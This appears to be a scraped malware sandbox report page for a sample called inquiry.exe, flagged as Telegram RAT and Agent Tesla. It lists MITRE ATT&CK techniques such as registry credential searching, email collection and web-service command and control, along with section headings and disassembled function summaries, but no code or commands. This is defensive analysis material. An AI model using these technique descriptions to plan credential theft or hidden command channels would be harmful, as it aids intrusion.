Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report inquiry.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 00D41670, Relevance: 342.0, APIs: 6, Strings: 189, Instructions: 767
stringmemorywindowCOMMON

Function 00D46367, Relevance: 4.6, APIs: 3, Instructions: 59
memoryCOMMON

Function 00D41450, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorystringCOMMON

Function 00D410B0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 60
memoryCOMMON

Function 00D44142, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Function 00D44111, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 00D41160, Relevance: 79.0, APIs: 35, Strings: 10, Instructions: 225
memorystringregistryCOMMON

Function 00D415A0, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
registryCOMMON

Function 00D42E3A, Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Function 00D41000, Relevance: 9.1, APIs: 6, Instructions: 66
memoryregistryCOMMON

Function 00D42ECD, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20
libraryloaderCOMMON

Function 00D4855A, Relevance: 6.1, APIs: 4, Instructions: 97
COMMON

Function 00D463F9, Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Function 00D49DCD, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Function 00D46D06, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre